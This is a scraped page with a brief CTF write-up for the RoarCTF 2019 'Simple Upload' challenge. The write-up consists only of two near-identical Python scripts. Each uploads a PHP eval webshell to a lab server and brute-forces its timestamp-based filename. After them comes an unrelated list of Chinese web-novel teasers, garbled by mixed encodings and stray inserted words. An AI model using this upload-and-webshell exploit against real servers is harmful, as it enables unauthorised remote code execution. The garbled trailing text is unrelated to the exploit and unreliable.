2019-12-04 [RoarCTF 2019]Simple Upload WriteUp

import requests
import time
import json

url = "http://33553ba3-3ecf-4551-af99-378c3c2504a6.node3.buuoj.cn"

path = url + "/index.php/home/index/upload"
files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
r = requests.post(path, files=files)
t1 = r.text.split("/")[-1].split(".")[0]
param=json.loads(r.content)
print(param)
t1 = int(t1, 16)

j = t1
while True:
    path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:]
    try:
        r = requests.get(path,timeout=1)
    except:
        continue
    if r.status_code == 429:#規(guī)避過于頻繁訪問導(dǎo)致的429
        time.sleep(0.1)
        continue
    elif r.status_code != 404:
        print(path)
        print(r.text)
        break
    print(j, path, r.status_code)
    j -= 1

import requests
import time
import json

url = "http://443e6467-a00e-47ec-b8cb-6af3da800131.node3.buuoj.cn/"

path = url + "/index.php/home/index/upload"
files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
r = requests.post(path, files=files)
t1 = r.text.split("/")[-1].split(".")[0]
param=json.loads(r.content)
print param
t1 = int(t1, 16)

j = t1
while True:
    path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:]
    try:
        r = requests.get(path,timeout=1)
    except:
        continue
    if r.status_code == 429:#規(guī)避過于頻繁訪問導(dǎo)致的429
        time.sleep(0.1)
        continue
    elif r.status_code != 404:
        print path
        print r.text
        break
    print j, path, r.status_code
    j -= 1

• 人面猴

  序言：七十年代末贼陶，一起剝皮案震驚了整個(gè)濱河市刃泡，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌碉怔，老刑警劉巖烘贴，帶你破解...

  沈念sama閱讀 218,941評(píng)論 6贊 508
• 死咒

  序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場(chǎng)離奇詭異撮胧，居然都是意外死亡桨踪，警方通過查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...

  沈念sama閱讀 93,397評(píng)論 3贊 395
• 救了他兩次的神仙讓他今天三更去死

  文/潘曉璐 我一進(jìn)店門芹啥，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)馒闷，“玉大人，你說我怎么就攤上這事叁征∧烧耍” “怎么了？”我有些...

  開封第一講書人閱讀 165,345評(píng)論 0贊 356
• 道士緝兇錄：失蹤的賣姜人

  文/不壞的土叔 我叫張陵捺疼，是天一觀的道長(zhǎng)疏虫。 經(jīng)常有香客問我，道長(zhǎng)啤呼，這世上最難降的妖魔是什么卧秘？ 我笑而不...

  開封第一講書人閱讀 58,851評(píng)論 1贊 295
• ?港島之戀（遺憾婚禮）

  正文 為了忘掉前任，我火速辦了婚禮官扣，結(jié)果婚禮上翅敌，老公的妹妹穿的比我還像新娘。我一直安慰自己惕蹄，他們只是感情好蚯涮，可當(dāng)我...

  茶點(diǎn)故事閱讀 67,868評(píng)論 6贊 392
• 惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的

  文/花漫 我一把揭開白布。 她就那樣靜靜地躺著卖陵，像睡著了一般遭顶。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上泪蔫，一...

  開封第一講書人閱讀 51,688評(píng)論 1贊 305
• 城市分裂傳說

  那天棒旗，我揣著相機(jī)與錄音，去河邊找鬼撩荣。 笑死铣揉，一個(gè)胖子當(dāng)著我的面吹牛饶深，可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播逛拱，決...

  沈念sama閱讀 40,414評(píng)論 3贊 418
• 雙鴛鴦連環(huán)套：你想象不到人心有多黑

  文/蒼蘭香墨 我猛地睜開眼粥喜，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼！你這毒婦竟也來(lái)了橘券？” 一聲冷哼從身側(cè)響起额湘，我...

  開封第一講書人閱讀 39,319評(píng)論 0贊 276
• 萬(wàn)榮殺人案實(shí)錄

  序言：老撾萬(wàn)榮一對(duì)情侶失蹤，失蹤者是張志新（化名）和其女友劉穎旁舰，沒想到半個(gè)月后锋华，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...

  沈念sama閱讀 45,775評(píng)論 1贊 315
• ?護(hù)林員之死

  正文 獨(dú)居荒郊野嶺守林人離奇死亡箭窜，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...

  茶點(diǎn)故事閱讀 37,945評(píng)論 3贊 336
• ?白月光啟示錄

  正文 我和宋清朗相戀三年毯焕，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片磺樱。...

  茶點(diǎn)故事閱讀 40,096評(píng)論 1贊 350
• 活死人

  序言：一個(gè)原本活蹦亂跳的男人離奇死亡纳猫，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出竹捉，到底是詐尸還是另有隱情芜辕，我是刑警寧澤，帶...

  沈念sama閱讀 35,789評(píng)論 5贊 346
• ?日本核電站爆炸內(nèi)幕

  正文 年R本政府宣布块差，位于F島的核電站侵续，受9級(jí)特大地震影響，放射性物質(zhì)發(fā)生泄漏憨闰。R本人自食惡果不足惜状蜗，卻給世界環(huán)境...

  茶點(diǎn)故事閱讀 41,437評(píng)論 3贊 331
• 男人毒藥：我在死后第九天來(lái)索命

  文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望鹉动。 院中可真熱鬧轧坎，春花似錦、人聲如沸泽示。這莊子的主人今日做“春日...

  開封第一講書人閱讀 31,993評(píng)論 0贊 22
• 一樁弒父案，背后竟有這般陰謀

  文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)边琉。三九已至属百，卻和暖如春记劝，著一層夾襖步出監(jiān)牢的瞬間变姨，已是汗流浹背。 一陣腳步聲響...

  開封第一講書人閱讀 33,107評(píng)論 1贊 271
• 情欲美人皮

  我被黑心中介騙來(lái)泰國(guó)打工厌丑， 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留定欧，地道東北人渔呵。 一個(gè)月前我還...

  沈念sama閱讀 48,308評(píng)論 3贊 372
• 代替公主和親

  正文 我出身青樓，卻偏偏與公主長(zhǎng)得像砍鸠，于是被迫代替她去往敵國(guó)和親扩氢。 傳聞我的和親對(duì)象是個(gè)殘疾皇子，可洞房花燭夜當(dāng)晚...

  茶點(diǎn)故事閱讀 45,037評(píng)論 2贊 355